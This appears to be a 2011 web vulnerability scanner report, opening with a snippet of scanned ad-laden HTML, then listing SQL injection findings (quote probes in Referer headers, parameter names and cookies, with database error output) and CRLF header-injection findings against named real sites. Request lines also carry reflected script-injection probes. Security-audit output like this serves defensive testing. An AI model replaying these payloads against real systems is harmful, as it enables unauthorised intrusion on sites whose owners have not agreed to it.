Content-Length: 85131

<HTML>
<HEAD>
<title>ISP-Planet - Value-Added Services - VoIP Wholesale Provider Quick Reference Chart</title>
<meta name="channel" content="ISP Resources">
<meta name="author" content="Jeff Goldm
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=5063581;u=j;z=20110218123049" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=695839/641606/641605/581996/581034;s=9538;x=3584;f=5063581;u=j;z=20110218123049" alt="Click here"></a>
</noscript>
</div>

</TD>
</TR>
<TR>
<TD align="center"><span class='quad_S'><style type="text/css">
span.ciu_wrapper div { padding: 10px; }
</style><span class="ciu_wrapper">

<script language="JavaScript">zzfocrender("203", "9538", "644256/641606/641605/581996/581034", "59", "600", "200", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=296806960;u=j;z=20110218123049" target="_blank">
<img border="0" width="600" height="200" src="http://o1.qnsr.com/cgi/x?;n=203;c=644256/641606/641605/581996/581034;s=9538;x=15104;f=296806960;u=j;z=20110218123049" alt="Click here"></a>
</noscript>
</span></div>
</TD>
</TR>
</table>
</TD>
</TR>
<TR>
<TD WIDTH="150" VALIGN="TOP">
<CENTER>
&nbsp;<A HREF="http://www.internet.com/"><IMG SRC="/img/icom-logo-micro.gif" WIDTH=130 HEIGHT=28 BORDER=0 ALT="Internet.com"></A>
<a href="http://www.isp-planet.com/"><IMG SRC="/img/planet-mini.gif" ALT="ISP-Planet" WIDTH="106" HEIGHT="62" HSPACE="0" VSPACE="0" BORDER="0"></a>
<BR>
<!-- =====SPONSORSHIP===== -->
<!-- : Missing QUAD ads for page_type: other on path www.isp-planet.com with position sitetext-1
url: /services/voip_wholesalers/chart.html --><span class='quad_sitetext-1'></div>

<div align="left"> <p>&nbsp;</p>
<p align="center"><BR>
<!--AdSpacesite=internetcom&foo=bar&size=125x125&PagePos=10&channel=_CHANNEL_&content_site=_SITE_&feature=_FEATURE_-->
<span class='quad_J'>
<script language="JavaScript">zzfocrender("203", "9538", "641817/641606/641605/581996/581034", "6", "125", "125", "", "", "");</script>
<noscript>
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=641817/641606/641605/581996/581034;s=9538;
...[SNIP]...

1.12. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:56:22 GMT
Server: Apache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

GET /outsourcing-dot-net-development-contact-us.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:56:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 11242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...

1.13. http://www.outsourcingdotnetdevelopment.com/outsourcing-dot-net-development-contact-us.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /outsourcing-dot-net-development-contact-us.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /outsourcing-dot-net-development-contact-us.html?1'=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee3021d3c780=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:56:09 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 7083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /outsourcing-dot-net-development-contact-us.html?1''=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Proxy-Connection: keep-alive
Referer: http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html?3906b%22%3E%3Cscript%3Ealert(1)%3C/script%3Ee3021d3c780=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=hf79nisglos82m29flubv3rp81

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 16:56:09 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 10176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="IT Solut
...[SNIP]...

1.14. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:03:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 171

Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',now())' at line 1

Request 2

GET /xss-cross-site-scripting.html HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:03:15 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=5rucoa6at9abkm1iohmum4tot6; path=/
Connection: close
Content-Type: text/html
Content-Length: 20709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...

1.15. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outsourcingdotnetdevelopment.com
Path:   /xss-cross-site-scripting.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /xss-cross-site-scripting.html?1'=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:02:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=csfbfupdfs7fadg0nmfn1lj946; path=/
Connection: close
Content-Type: text/html
Content-Length: 7658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...
</strong>
Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and link1.deleted = 0 and link2.deleted = 0 and link_cache.deleted = 0' at line 1

Request 2

GET /xss-cross-site-scripting.html?1''=1 HTTP/1.1
Host: www.outsourcingdotnetdevelopment.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:02:48 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=rmdtso7ajurlau4d8tk2uvoj34; path=/
Connection: close
Content-Type: text/html
Content-Length: 19753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="xss (cro
...[SNIP]...

1.16. http://www.phpbuilder.com/ [QUADIDX cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phpbuilder.com
Path:   /

Issue detail

The QUADIDX cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the QUADIDX cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=1 HTTP/1.1
Host: www.phpbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.phpbuilder.com/welcomead/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107'; intmintc__welcome; toURL=http%3A//www.phpbuilder.com/%3F7640d--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eeb4ef76d865%3D1; qsg=14508

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:02:03 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:03:03 GMT
Content-Type: text/html
Content-Length: 72630


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<a href="/columns/tim20000705.php3">MySQL and PostgreSQL Compared</a>
...[SNIP]...

Request 2

GET /?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=1 HTTP/1.1
Host: www.phpbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.phpbuilder.com/welcomead/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107''; intmintc__welcome; toURL=http%3A//www.phpbuilder.com/%3F7640d--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eeb4ef76d865%3D1; qsg=14508

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 17:02:04 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Feb 2011 17:03:04 GMT
Content-Type: text/html
Content-Length: 72646


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...

2. HTTP header injection  previous  next
There are 32 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6d131%0d%0ac8d42010e20 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif6d131%0d%0ac8d42010e20?%r? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif6d131
c8d42010e20
:
Date: Fri, 18 Feb 2011 15:53:42 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://j.jioet.com/cgi/r [;n parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the ;n request parameter is copied into the Location response header. The payload a7230%0d%0a38761888e3a was submitted in the ;n parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110a7230%0d%0a38761888e3a&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:47:33 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qZQqABU0AAG@IOQw; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:47:33 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:47:33 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk163110218044733050ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:47:33 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110a7230
38761888e3a
&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=163110218044733050&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1138

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.3. http://j.jioet.com/cgi/r [InternalReferralURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the InternalReferralURL request parameter is copied into the Location response header. The payload 17105%0d%0a761b2c412d9 was submitted in the InternalReferralURL parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http%3A%2F%2Fwww%2Evendorseek%2Ecom%2Fwebsite%5Fdesign%5Fand%5Fecommerce%2Easp%3F%26CCID%3D20099791203555503%26QTR%3DZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ%26CLK%3D166110218044716818%26%26CCID%3D20123519203630910%26QTR%3DZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910%2C203630910Zs9544ZZ%26CLK%3D394110218044719808%26%26exp%3Dy%26%26exp%3Dy&InternalReferralURL=17105%0d%0a761b2c412d9&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:46 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TV5qrgqABU0AAFrNY7g; domain=.jioet.com; path=/; expires=Mon, 15-Feb-21 12:48:46 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Set-Cookie: qsg=14508; path=/; EXPIRES=Mon, 13-Feb-12 12:48:46 GMT; DOMAIN=.jioet.com
Set-Cookie: QPC201004061902210=ZZa20114257Zc203585399%2C203585399Zg172Zw56Zm0Zs6598Zk294110218044846981ZrNULLZiNULLZt149ZZ; path=/; EXPIRES=Sun, 20-Mar-11 12:48:46 GMT; DOMAIN=.jioet.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=17105
761b2c412d9
&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=294110218044846981&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1138

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://forms.vendorseek.com/controller?srvid=67110
...[SNIP]...

2.4. http://j.jioet.com/cgi/r [LeadSiteURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://j.jioet.com
Path:   /cgi/r

Issue detail

The value of the LeadSiteURL request parameter is copied into the Location response header. The payload 57288%0d%0a1f8a21ef9e9 was submitted in the LeadSiteURL parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/r?;n=203;c=585399;s=6598;x=7936;f=201004061902210;u=j;z=TIMESTAMP;k=http://forms.vendorseek.com/controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=57288%0d%0a1f8a21ef9e9&InternalReferralURL=&hidepriv=true& HTTP/1.1
Host: j.jioet.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:42 GMT
Server: QUAD 3G
